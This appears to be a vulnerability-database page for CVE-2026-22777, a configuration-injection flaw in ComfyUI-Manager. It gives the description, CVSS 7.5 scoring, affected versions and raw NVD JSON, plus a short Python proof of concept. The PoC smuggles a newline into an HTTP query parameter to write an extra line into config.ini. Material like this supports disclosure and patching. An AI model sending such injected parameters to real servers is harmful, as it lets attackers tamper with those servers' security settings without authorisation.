Security Vulnerability Report
中文
CVE-2026-22777 CVSS 7.5 HIGH

CVE-2026-22777

Published: 2026-01-10 07:16:04
Last Modified: 2026-02-05 21:02:06
Source: [email protected]

Description

ComfyUI-Manager is an extension designed to enhance the usability of ComfyUI. Prior to versions 3.39.2 and 4.0.5, an attacker can inject special characters into HTTP query parameters to add arbitrary configuration values to the config.ini file. This can lead to security setting tampering or modification of application behavior. This issue has been patched in versions 3.39.2 and 4.0.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:* - VULNERABLE
ComfyUI-Manager < 3.39.2
ComfyUI-Manager < 4.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-22777 PoC - Configuration Injection url = "http://target.com/api/config" payload = { "key": "malicious_key\nmalicious_config=true", "value": "injected_value" } response = requests.get(url, params=payload) print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22777", "sourceIdentifier": "[email protected]", "published": "2026-01-10T07:16:03.680", "lastModified": "2026-02-05T21:02:05.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ComfyUI-Manager is an extension designed to enhance the usability of ComfyUI. Prior to versions 3.39.2 and 4.0.5, an attacker can inject special characters into HTTP query parameters to add arbitrary configuration values to the config.ini file. This can lead to security setting tampering or modification of application behavior. This issue has been patched in versions 3.39.2 and 4.0.5."}, {"lang": "es", "value": "ComfyUI-Manager es una extensión diseñada para mejorar la usabilidad de ComfyUI. Antes de las versiones 3.39.2 y 4.0.5, un atacante puede inyectar caracteres especiales en los parámetros de consulta HTTP para añadir valores de configuración arbitrarios al archivo config.ini. Esto puede llevar a la manipulación de la configuración de seguridad o a la modificación del comportamiento de la aplicación. Este problema ha sido parcheado en las versiones 3.39.2 y 4.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.39.2", "matchCriteriaId": "A013F11E-DEAA-4DA0-97EE-667AEDE64317"}, {"vulnerable": true, "criteria": "cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.3", "versionEndExcluding": "4.0.5", "matchCriteriaId": "739DC981-BB57-45A4-A8CB-1CF26CA53EB2"}]}]}], "references": [{"url": "https://github.com/Comfy-Org/ComfyUI-Manager/commit/f4fa394e0f03b013f1068c96cff168ad10bd0410", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.